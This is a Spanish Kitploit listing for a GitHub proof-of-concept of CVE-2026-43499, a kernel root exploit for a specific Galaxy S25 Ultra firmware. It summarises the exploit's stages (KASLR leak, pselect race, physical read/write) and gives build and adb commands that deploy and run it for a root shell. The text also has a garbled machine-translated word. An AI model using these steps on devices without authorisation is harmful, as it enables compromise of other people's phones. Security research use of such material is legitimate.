Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-43499-S25U — Independiente CVE-2026-43499 PoC para Galaxy S25 Ultra SM-S938N S938NKSUACZF1 | Kitploit
Herramientas/GitHubGitHub/busung-dev/cve-2026-43499-s25u
Seguridad AndroidEscalada de PrivilegiosExplotaciónPost-ExplotaciónRed TeamingDesarrollo de PayloadsExplotación de Binarios
GitHubbusung-dev/cve-2026-43499-s25u

CVE-2026-43499-S25U

Independiente CVE-2026-43499 PoC para Galaxy S25 Ultra SM-S938N S938NKSUACZF1

Ver Repositorio
39103hace 1 mesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-43499 PoC para Galaxy S25 Ultra

Prueba de concepto específica del dispositivo para CVE-2026-43499 en el Samsung Galaxy S25 Ultra coreano.

Objetivo compatible

root@kitploit:~
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages

Los desplazamientos y diseños de estructura solo son válidos para el firmware anterior.

Referencia

Este puerto se basa en:

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • Revisión upstream: b850d3bddc74c3328d5fbcc0568d21962b55d949

La licencia Apache 2.0 original se conserva en LICENSE.

Cambios del puerto

  • Se agregaron los desplazamientos y diseños del kernel pa3q-S938NKSUACZF1.
  • Se agregó la recuperación del deslizamiento KASLR basada en tracefs para este kernel de Samsung.
  • Se移植ó la carrera pselect, la etapa CFI/FOPS y la primitiva de lectura/escritura física.
  • Se agregó la ruta raíz del ayudante de modo de usuario system_unbound_wq específica del dispositivo.
  • Se agregaron procesos de reintento aislados con la secuencia de retardo pselect ajustada al dispositivo.
  • Conserva las páginas recuperadas después del éxito para evitar reciclar objetos falsificados activos.

Compilación

Establezca ANDROID_NDK_HOME en Android NDK r29 o un conjunto de herramientas compatible:

root@kitploit:~
make -j8

Salidas:

root@kitploit:~
build/cve-2026-43499
build/cve-2026-43499-root

Despliegue y ejecución

root@kitploit:~
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

El exploit tiene por defecto 16 intentos independientes y un retardo base pselect de 20,000 microsegundos. Sobrescríbalos al recopilar datos de temporización:

root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"

La sesión raíz temporal y las asignaciones retenidas duran hasta el reinicio.

Para instalación con un clic y soporte KernelSU, use Root My Galaxy.

Úselo solo en dispositivos que posea o para los que tenga autorización explícita para realizar pruebas.

Descargar herramienta